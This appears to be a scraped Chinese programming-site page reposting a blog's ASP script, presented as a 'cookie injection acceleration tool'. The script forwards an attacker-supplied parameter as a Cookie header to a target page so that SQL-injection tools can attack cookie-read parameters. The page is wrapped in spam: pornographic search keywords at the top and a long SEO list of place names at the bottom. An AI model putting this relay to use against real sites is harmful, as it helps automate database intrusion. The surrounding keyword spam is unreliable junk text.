国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > ASP > 正文

ASP版實現cookies注入加速工具

2024-05-04 11:01:03
字體:
來源:轉載
供稿:網友
來源:職業欠錢&zj1244共用的public Blog


復制代碼 代碼如下:
<% 
Str="xxxid="&escape(request("FK")) 
Url="http://xxx.chinaxxx.com/injection.asp" 
response.write PostData(Url,Str) 

Function PostData(PostUrl,PostCok)  
Dim Http 
Set Http = Server.CreateObject("msxml2.serverXMLHTTP") 
With Http 

.Open "GET",PostUrl,False 
.SetRequestHeader "Cookie",PostCok 
.Send 
PostData = .ResponseBody 
End With 
Set Http = Nothing 
PostData =bytes2BSTR(PostData) 
End Function 

Function bytes2BSTR(vIn) 
Dim strReturn 
Dim I, ThisCharCode, NextCharCode 
strReturn = "" 
For I = 1 To LenB(vIn) 
ThisCharCode = AscB(MidB(vIn, I, 1)) 
If ThisCharCode < &H80 Then 
strReturn = strReturn & Chr(ThisCharCode) 
Else 
NextCharCode = AscB(MidB(vIn, I + 1, 1)) 
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
I = I + 1 
End If 
Next 
bytes2BSTR = strReturn 
End Function 

%>
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 蒙自县| 湟中县| 故城县| 札达县| 安西县| 华亭县| 沿河| 剑川县| 博兴县| 夏河县| 常德市| 股票| 安西县| 堆龙德庆县| 竹北市| 古田县| 磐安县| 安徽省| 肥东县| 天祝| 宁陵县| 新蔡县| 邢台县| 威海市| 冷水江市| 东乌珠穆沁旗| 射洪县| 北辰区| 石棉县| 池州市| 阿合奇县| 邢台县| 库尔勒市| 岚皋县| 青神县| 兴安县| 石嘴山市| 大荔县| 大港区| 盘锦市| 静安区|